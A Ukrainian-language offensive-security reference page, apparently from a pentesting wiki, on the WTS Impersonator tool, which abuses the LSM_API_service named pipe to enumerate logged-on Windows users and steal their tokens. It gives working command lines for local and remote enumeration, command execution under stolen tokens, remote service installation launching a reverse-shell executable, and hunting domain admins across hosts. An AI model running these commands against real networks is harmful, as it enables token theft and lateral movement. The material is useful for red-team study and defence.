WTS Impersonator

Інструмент WTS Impersonator використовує "\pipe\LSM_API_service" RPC Named pipe для тихого перерахунку увійшлих користувачів та перехоплення їх токенів, обходячи традиційні техніки імперсонування токенів. Цей підхід полегшує безперешкодні бічні переміщення в мережах. Інновація, що стоїть за цією технікою, належить Omri Baso, чия робота доступна на GitHub.

Основна функціональність

Інструмент працює через послідовність викликів API:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Key Modules and Usage

• Перерахунок користувачів: Локальний та віддалений перерахунок користувачів можливий за допомогою інструменту, використовуючи команди для кожного сценарію:

• Локально:

.\WTSImpersonator.exe -m enum

• Віддалено, вказавши IP-адресу або ім'я хоста:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Виконання команд: Модулі exec та exec-remote вимагають контексту Служби для функціонування. Локальне виконання просто потребує виконуваного файлу WTSImpersonator та команди:

• Приклад для локального виконання команди:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe можна використовувати для отримання контексту служби:

.\PsExec64.exe -accepteula -s cmd.exe

• Віддалене виконання команд: Включає створення та встановлення служби віддалено, подібно до PsExec.exe, що дозволяє виконання з відповідними правами.

• Приклад віддаленого виконання:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Модуль полювання на користувачів: Орієнтується на конкретних користувачів на кількох машинах, виконуючи код під їхніми обліковими даними. Це особливо корисно для націлювання на доменних адміністраторів з локальними правами адміністратора на кількох системах.

• Приклад використання:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe